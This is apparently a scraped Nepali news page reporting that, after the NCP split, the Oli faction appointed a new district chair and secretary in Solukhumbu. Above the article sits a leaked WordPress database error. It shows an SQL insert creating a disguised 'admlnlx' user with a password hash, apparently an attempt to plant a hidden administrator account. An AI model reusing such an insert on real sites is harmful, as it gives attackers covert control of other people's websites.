WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bh5z3SgBMVZMPDxCEJ.T4tLTtkuVEx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:45:51', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । संसद विघटनको विषयलाई लिएर नेकपा दुई धारमा विभाजन भएपछि सोमबार सल्लेरीमा आयोजित बृहत अगुवा कार्यकर्ता भेलाको अवसरमा ओली समूहले बास्तोलालाई जिल्ला अध्यक्षको जिम्मेवारी सुम्पेको हो । उनी नेचासल्यान गाउँपालिका अध्यक्ष पनि हुन् ।
त्यस्तै, पार्टीको जिल्ला सचिवको जिम्मेवारी आश कुमार राई ‘शिशिर’लाई दिइएको छ । उनी पुर्वमाओबादीका हुन् । पुर्वएमाले र माओबादीको एकतापछि मानवीर राई जिल्ला अध्यक्ष र गोम्बु शेर्पा (कर्ज्याङ) सचिबको जिम्मेवारीमा थिए ।
पार्टी विभाजनको संघारमा गोम्बु शेर्पा (कर्ज्याङ) नेकपाको प्रचण्ड–माधव समूहमा लागेपछि ओली समूहले जिल्ला नेतृत्व परिर्वतन गरेको हो ।
पुर्व जिल्ला अध्यक्ष मानवीर राईलाई यसअघि नै ओली समूहले विस्तार गरेको केन्द्रीय सदस्यमा मनोनित गरिएको छ ।